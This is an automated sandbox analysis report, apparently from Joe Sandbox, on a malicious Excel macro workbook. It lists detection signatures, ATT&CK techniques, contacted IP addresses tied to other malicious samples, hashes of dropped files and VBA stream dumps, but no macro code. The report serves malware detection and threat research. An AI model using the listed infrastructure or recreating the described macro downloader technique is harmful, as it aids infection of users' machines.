Analysis Report 91476525608-04012021.xlsm
Overview
General Information
Detection
Score: | 80 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
Startup |
---|
|
Malware Configuration |
---|
No configs have been found |
---|
Yara Overview |
---|
No yara matches |
---|
Sigma Overview |
---|
System Summary: |
---|
Sigma detected: Microsoft Office Product Spawning Windows Shell | Show sources |
Source: | Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: |
Signature Overview |
---|
Click to jump to signature section
AV Detection: |
---|
Antivirus detection for URL or domain | Show sources |
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: |
Source: | File opened: |
Software Vulnerabilities: |
---|
Document exploit detected (UrlDownloadToFile) | Show sources |
Source: | Section loaded: |
Document exploit detected (process start blacklist hit) | Show sources |
Source: | Process created: |
Source: | TCP traffic: |
Source: | TCP traffic: |
Source: | IP Address: | ||
Source: | IP Address: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: |
Source: | File created: | Jump to behavior |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | String found in binary or memory: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
System Summary: |
---|
Found malicious Excel 4.0 Macro | Show sources |
Source: | Initial sample: |
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) | Show sources |
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: |
Found Excel 4.0 Macro with suspicious formulas | Show sources |
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: |
Source: | OLE, VBA macro line: |
Source: | OLE indicator, VBA macros: |
Source: | Binary or memory string: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | File read: | Jump to behavior |
Source: | Key opened: |
Source: | Process created: |
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: |
Source: | Automated click: | ||
Source: | Automated click: | ||
Source: | Automated click: |
Source: | Window detected: |
Source: | Initial sample: | ||
Source: | Initial sample: |
Source: | Key opened: |
Source: | File opened: |
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: |
Mitre Att&ck Matrix |
---|
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | Scripting22 | Path Interception | Process Injection1 | Masquerading1 | OS Credential Dumping | File and Directory Discovery1 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Non-Application Layer Protocol1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Exploitation for Client Execution22 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools1 | LSASS Memory | System Information Discovery2 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Application Layer Protocol11 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Rundll321 | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Ingress Tool Transfer2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection1 | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Scripting22 | LSA Secrets | Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
Behavior Graph |
---|
Screenshots |
---|
Thumbnails
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Antivirus, Machine Learning and Genetic Malware Detection |
---|
Initial Sample |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
2% | ReversingLabs | Document-Office.Trojan.Heuristic |
Dropped Files |
---|
No Antivirus matches |
---|
Unpacked PE Files |
---|
No Antivirus matches |
---|
Domains |
---|
No Antivirus matches |
---|
URLs |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
100% | Avira URL Cloud | malware | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
100% | Avira URL Cloud | malware | ||
0% | Avira URL Cloud | safe |
Domains and IPs |
---|
Contacted Domains |
---|
No contacted domains info |
---|
Contacted URLs |
---|
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
true |
| unknown | |
true |
| unknown | |
false |
| unknown |
URLs from Memory and Binaries |
---|
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false | high |
Contacted IPs |
---|
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
Public |
---|
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
195.123.210.186 | unknown | Bulgaria | 50979 | ITL-LV | false | |
45.150.67.243 | unknown | Montenegro | 61317 | ASDETUKhttpwwwheficedcomGB | false | |
91.211.89.28 | unknown | Ukraine | 206638 | HOSTFORYUA | false |
General Information |
---|
Joe Sandbox Version: | 31.0.0 Emerald |
Analysis ID: | 380316 |
Start date: | 01.04.2021 |
Start time: | 21:44:37 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 5m 34s |
Hypervisor based Inspection enabled: | false |
Report type: | light |
Sample file name: | 91476525608-04012021.xlsm |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2) |
Run name: | Without Instrumentation |
Number of analysed new started processes analysed: | 8 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal80.expl.evad.winXLSM@7/7@0/3 |
EGA Information: | Failed |
HDC Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
Warnings: | Show All
|
Simulations |
---|
Behavior and APIs |
---|
No simulations |
---|
Joe Sandbox View / Context |
---|
IPs |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
195.123.210.186 | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
45.150.67.243 | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
Domains |
---|
No context |
---|
ASN |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
HOSTFORYUA | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
ITL-LV | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
ASDETUKhttpwwwheficedcomGB | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
JA3 Fingerprints |
---|
No context |
---|
Dropped Files |
---|
No context |
---|
Created / dropped Files |
---|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 158055 |
Entropy (8bit): | 7.981278766139217 |
Encrypted: | false |
SSDEEP: | 3072:4XE59b4DETZU4yvUCidynhV912A7bF8mrcLwKw55eiETTcDGq:AE5SDvbXAyHbVt15wTQDl |
MD5: | CB67CED3017DF7803FBA5D86FCEB4276 |
SHA1: | C7B8B4A44BDF7F7775F61FCF236A0834CB321733 |
SHA-256: | C31F711B323EA0B1D04C7A72ECAC0BBBF4DC4ECC56F837FEFE754F53385D07B1 |
SHA-512: | 1E70FD6101A50A0AEDFF22C2DB22A5FB4E063C02E6C062097A973FED663E6623BDA2FFA33B266001AB99BA5AA945FA51C1571C553015C8F8633D68BFA7F663D1 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 177711 |
Entropy (8bit): | 7.962744490730696 |
Encrypted: | false |
SSDEEP: | 3072:3FqZjdXE59b4DETZU4yvUCidynhV912A7bF8mrcLwKw55eiETTcDGU:3QZhE5SDvbXAyHbVt15wTQD5 |
MD5: | F80A2F4E7C0640F149C98E31384122A5 |
SHA1: | 25420178516720A4D19C545AF6A2578A499C336C |
SHA-256: | 0A3FD81E8727B17592E9C2A95F5513D6AA1C75AAA83E5A4A4FEA3C047798E480 |
SHA-512: | 6B31B35AF315B4E18B54057C6C5B289C4E34E3E4B399A13B2060C2154163A465796E6E793A93F9B45194E04C04DDA00301C13E732E293775BDE0D813EB07C570 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 2138 |
Entropy (8bit): | 4.509971590376543 |
Encrypted: | false |
SSDEEP: | 24:8O/XTd6jFyS2LhepRDv3qodM7dD2O/XTd6jFyS2LhepRDv3qodM7dV:8O/XT0jFF2LhBoQh2O/XT0jFF2LhBoQ/ |
MD5: | 21986204C8A142FBAA4D3BB50CAC4FBE |
SHA1: | 810F92044A00628D2286C4748FC9229C30708DE4 |
SHA-256: | 8AED2A53F3130D62A3DF6FD41C348AF4675B7C3AA8C740E838D87085F4AF38CD |
SHA-512: | 701FAE97FD2A535AF5FC4293E6F6A6BDA2405653C39F6D335C82B6B5534A4661F814F25F3460A3179B588C840AB31D1280C1B0871E785AA9333508B04384509C |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 867 |
Entropy (8bit): | 4.484541587998017 |
Encrypted: | false |
SSDEEP: | 12:85Qa2LgXg/XAlCPCHaXtB8XzB/a/X+WnicvbxbDtZ3YilMMEpxRljK2yTdJP9TdU:854/XTd6jsYexDv3qorNru/ |
MD5: | 662DAD751B67554F6EE8E750BC0DD74E |
SHA1: | AE2A19D11FF5B452BB8212FBB1B1E47F63A6C8D3 |
SHA-256: | 7B0C79920F6F8A68576CCA63F22C33D89E09AA737C707D33A736082A03BD00D2 |
SHA-512: | 6720DD2D3679090D39051952A645EB216E013C294A633B9ECE31D26FEAFAD202A39954E677293D98EEBE144D01026D06FCEBEB9ABBF522512C0EA5EF79058A63 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 115 |
Entropy (8bit): | 4.476951246088606 |
Encrypted: | false |
SSDEEP: | 3:oyBVomxW4AECl+TEClmxW4AEClv:djUECQTEC9EC1 |
MD5: | 9A8B152F14E864A0442647375EAEF800 |
SHA1: | F75AE3EA100D77463B10071D490354CE3FAFF74F |
SHA-256: | 73CA17369F3CDE5E4DA9BACAF17ABF3264FB8EF524E83EE66E236640EF078B72 |
SHA-512: | 4234F266B163E10DE754A42353D1DF1F91BFB348A76BA9C8DEA9EDF242C9D797DDABB3E7E00742C672BD6C4DBC127523D0750C42F54F390A0A6D97054BEE91A2 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 177712 |
Entropy (8bit): | 7.962665588794351 |
Encrypted: | false |
SSDEEP: | 3072:3Fq27kdXE59b4DETZU4yvUCidynhV912A7bF8mrcLwKw55eiETTcDGH:3Q2whE5SDvbXAyHbVt15wTQDC |
MD5: | FFE542EBE4C59D29854B73FD12A8B33E |
SHA1: | 2B77236C44668531C569C68A4697895A438179F1 |
SHA-256: | 7D1AA02604B404F30DB192CBDD3280076BEC32611BCF73FC0F02D12A9AC0EE9E |
SHA-512: | 4848C95DFC296D53B2BE32F03A9F0B2125647325E6BC7138A713C04E984F3BA7B5A508E5EC4D0FED30AEE9B94BFFCBD9C270DE803E9FFCDFBE89237B005D0CBB |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 330 |
Entropy (8bit): | 1.4377382811115937 |
Encrypted: | false |
SSDEEP: | 3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS |
MD5: | 96114D75E30EBD26B572C1FC83D1D02E |
SHA1: | A44EEBDA5EB09862AC46346227F06F8CFAF19407 |
SHA-256: | 0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523 |
SHA-512: | 52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0 |
Malicious: | true |
Reputation: | high, very likely benign file |
Preview: |
|
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 7.962528117929017 |
TrID: |
|
File name: | 91476525608-04012021.xlsm |
File size: | 176993 |
MD5: | e8d0244666daf465e9914a7f56938412 |
SHA1: | 3c5f71752b0cea18b06dfad9a96cdfeb053f45cc |
SHA256: | 196668480754f95f98c6e59d4776e4f8c756ad3be9fd48a27cfcb50be329567e |
SHA512: | d9d9cdfc5eed50798eb3ee4e60b9c5d6a8d7d52dbcce00e17b37681d3f43cd4ee5698b6b2bd1b3978ad24a402ca002b49ed6ef409e30ac8c94d7a503254da476 |
SSDEEP: | 3072:DXE59b4DETZU4yvUCidynhV912A7bF8mrcLwKw55eiETTcDGDKJj:LE5SDvbXAyHbVt15wTQD0KJj |
File Content Preview: | PK..........!..D.C............[Content_Types].xml ...(......................................................................................................................................................................................................... |
File Icon |
---|
Icon Hash: | e4e2aa8aa4bcbcac |
Static OLE Info |
---|
General | ||
---|---|---|
Document Type: | OpenXML | |
Number of OLE Files: | 1 |
OLE File "/opt/package/joesandbox/database/analysis/380316/sample/91476525608-04012021.xlsm" |
---|
Indicators | |
---|---|
Has Summary Info: | False |
Application Name: | unknown |
Encrypted Document: | False |
Contains Word Document Stream: | |
Contains Workbook/Book Stream: | |
Contains PowerPoint Document Stream: | |
Contains Visio Document Stream: | |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: | True |
Summary | |
---|---|
Author: | |
Last Saved By: | |
Create Time: | 2015-06-05T18:19:34Z |
Last Saved Time: | 2021-04-01T11:57:52Z |
Creating Application: | |
Security: | 0 |
Document Summary | |
---|---|
Thumbnail Scaling Desired: | false |
Company: | |
Contains Dirty Links: | false |
Shared Document: | false |
Changed Hyperlinks: | false |
Application Version: | 16.0300 |
Streams with VBA |
---|
VBA File Name: Module1.bas, Stream Size: 948 |
---|
General | |
---|---|
Stream Path: | VBA/Module1 |
VBA File Name: | Module1.bas |
Stream Size: | 948 |
Data ASCII: | . . . . . . . . . z . . . . . . . . . . . . . . . . . . . 1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 01 16 03 00 00 f0 00 00 00 7a 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 81 02 00 00 31 03 00 00 00 00 00 00 01 00 00 00 d2 b3 f0 e3 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |
VBA Code Keywords |
---|
Keyword |
---|
Application.Run |
Attribute |
Auto_Open() |
VB_Name |
Private |
VBA Code |
---|
|
Streams |
---|
Stream Path: PROJECT, File Type: ISO-8859 text, with CRLF line terminators, Stream Size: 527 |
---|
General | |
---|---|
Stream Path: | PROJECT |
File Type: | ISO-8859 text, with CRLF line terminators |
Stream Size: | 527 |
Entropy: | 5.31297412231 |
Base64 Encoded: | True |
Data ASCII: | I D = " { 0 0 0 0 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 0 0 0 0 0 0 0 0 } " . . D o c u m e n t = . . . . . . . . / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = . . . . 1 / & H 0 0 0 0 0 0 0 0 . . M o d u l e = M o d u l e 1 . . H e l p F i l e = " " . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " E 8 E A 4 4 9 2 4 8 9 2 4 8 9 7 4 D 9 7 4 D " . . D P B = " 3 5 3 7 9 9 A E A B E 6 C 8 E 6 C 8 1 |
Data Raw: | 49 44 3d 22 7b 30 30 30 30 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 30 30 30 30 30 30 30 30 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d dd f2 e0 ca ed e8 e3 e0 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d cb e8 f1 f2 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 4d 6f 64 75 6c 65 31 0d 0a 48 65 6c 70 46 69 6c 65 3d 22 |
Stream Path: PROJECTwm, File Type: data, Stream Size: 71 |
---|
General | |
---|---|
Stream Path: | PROJECTwm |
File Type: | data |
Stream Size: | 71 |
Entropy: | 3.95636440452 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . - . B . 0 . . . = . 8 . 3 . 0 . . . . . . . 1 . . . 8 . A . B . 1 . . . M o d u l e 1 . M . o . d . u . l . e . 1 . . . . . |
Data Raw: | dd f2 e0 ca ed e8 e3 e0 00 2d 04 42 04 30 04 1a 04 3d 04 38 04 33 04 30 04 00 00 cb e8 f1 f2 31 00 1b 04 38 04 41 04 42 04 31 00 00 00 4d 6f 64 75 6c 65 31 00 4d 00 6f 00 64 00 75 00 6c 00 65 00 31 00 00 00 00 00 |
Stream Path: VBA/_VBA_PROJECT, File Type: data, Stream Size: 2555 |
---|
General | |
---|---|
Stream Path: | VBA/_VBA_PROJECT |
File Type: | data |
Stream Size: | 2555 |
Entropy: | 4.01853324276 |
Base64 Encoded: | False |
Data ASCII: | . a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 . |
Data Raw: | cc 61 b2 00 00 03 00 ff 19 04 00 00 09 04 00 00 e3 04 03 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00 |
Stream Path: VBA/dir, File Type: data, Stream Size: 549 |
---|
General | |
---|---|
Stream Path: | VBA/dir |
File Type: | data |
Stream Size: | 549 |
Entropy: | 6.37926381995 |
Base64 Encoded: | True |
Data ASCII: | . ! . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . V B A P r o j e . c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . = . V b . . . . . J < . . . . . r . s t d o l e > . . . s . t . d . o . . l . e . . . h . % . ^ . . * \\ G { 0 0 . 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s t e m 3 2 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . . E O f f D i c . E O . f . . i . . c . E . . . . . . . E . 2 D F 8 D 0 4 C . - |
Data Raw: | 01 21 b2 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e3 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 3d c5 56 62 01 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47 |
Stream Path: VBA/\x1051\x1080\x1089\x10901, File Type: data, Stream Size: 990 |
---|
General | |
---|---|
Stream Path: | VBA/\x1051\x1080\x1089\x10901 |
File Type: | data |
Stream Size: | 990 |
Entropy: | 3.21290365488 |
Base64 Encoded: | True |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . . n } . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 d2 b3 6e 7d 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |
Stream Path: VBA/\x1069\x1090\x1072\x1050\x1085\x1080\x1075\x1072, File Type: data, Stream Size: 1009 |
---|
General | |
---|---|
Stream Path: | VBA/\x1069\x1090\x1072\x1050\x1085\x1080\x1075\x1072 |
File Type: | data |
Stream Size: | 1009 |
Entropy: | 3.24479314936 |
Base64 Encoded: | True |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9 . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
